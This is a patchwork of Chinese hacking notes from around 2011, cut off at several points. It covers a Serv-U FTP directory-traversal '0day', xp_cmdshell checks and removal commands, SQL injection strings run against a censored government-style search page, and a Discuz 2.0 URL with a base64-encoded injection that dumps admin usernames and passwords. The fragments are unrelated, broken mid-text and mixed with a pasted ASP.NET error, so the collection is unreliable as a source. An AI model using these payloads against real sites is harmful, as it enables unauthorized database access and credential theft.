[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]

/*
通过构造..:/来遍历服务器目录，下载任意文件
...

一、xp_cmdshell的删除及恢复

1、判断xp_cmdshell是否存在

(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

返回结果为1就ok

2、恢复xp_cmdshell的方法

删除扩展存储过过程xp_cmdshell的语句

exec sp_dropextendedproc 'xp_cmdshell'

窝窝团，尼玛的，坑爹啊

By：小A

    官方网址:http://www.reaft.com/

    Cms下载地址:http://www.reaft.com/html/1/200.html

    界面做的还不错，搜索了一下好像用的人很少，开始。

    首先看目录下 UpLoad.html 文件上传，调用了的是 UpLoad.asp。

...

SQL注入：http://www.*****.cn/ZW_index.aspx 
搜索注入
1、基本信息
数据库版本：
2011%' and 1=(select @@version) and '%'=''
数据库连接用户：
2011%' and user>0 and '%'='               

...

安全性异常
说明: 应用程序试图执行安全策略不允许的操作。要授予此应用程序所需的权限，请与系统管理员联系，或在配置文件中更改该应用程序的信任级别。

异常详细信息: System.Security.SecurityException: 请求“System.Security.Permissions.SecurityPermission, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089”类型的权限已失败。

转自互联网 如果谁是首发 麻烦给我说下 我会加上版权 联系邮箱：admin@f4le.com

DZ2.0直接暴管理账号密码
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D